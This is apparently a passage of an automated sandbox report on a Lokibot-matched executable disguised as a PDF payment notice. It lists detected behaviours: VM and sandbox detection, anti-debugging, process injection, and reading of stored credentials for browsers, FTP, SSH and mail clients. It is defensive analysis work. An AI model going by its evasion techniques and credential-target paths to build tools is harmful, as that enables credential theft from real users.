Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0044C8EC0_2_0044C8EC
Found API chain indicative of sandbox detectionShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_0-42855
Contains capabilities to detect virtual machinesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sysJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sysJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sysJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sysJump to behavior
Contains functionality to detect sandboxes (mouse cursor move detection)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: EndDoc,EndDoc,EndDoc,GetTickCount,GetCursorPos,GetCursorPos,Sleep,GetTickCount,ExitProcess,0_2_00481200
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00470974
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeAPI coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe TID: 2672Thread sleep time: -840000s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00408788 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408788
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00476F2C FindFirstFileA,GetLastError,FindClose,0_2_00476F2C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004052B8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004052B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004262E8 GetSystemInfo,0_2_004262E8
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmpBinary or memory string: |@j{C:\Windows\system32\drivers\vmhgfs.sys
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmpBinary or memory string: 9|C:\Windows\system32\drivers\VBoxGuest.syssh
Program exit pointsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-42865
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess queried: DebugObjectHandleJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042E988
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_0040317B mov eax, dword ptr fs:[00000030h]2_1_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeSection loaded: unknown target pid: 4276 protection: execute and read and writeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405470
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetLocaleInfoA,GetACP,0_2_0040C940
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetLocaleInfoA,0_2_0040B2E0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetLocaleInfoA,0_2_0040B294
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_0040557C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetLocaleInfoA,0_2_00405D9A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: GetLocaleInfoA,0_2_00405D9C
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00409D60 GetLocalTime,0_2_00409D60
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_00406069 GetUserNameW,2_2_00406069
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0045DC48 GetVersion,0_2_0045DC48
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe PID: 4276, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe PID: 4676, type: MEMORY
Source: Yara matchFile source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.dbJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txtJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.dbJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: PopPassword2_2_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: SmtpPassword2_2_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: PopPassword2_1_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: SmtpPassword2_1_0040D069

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 195637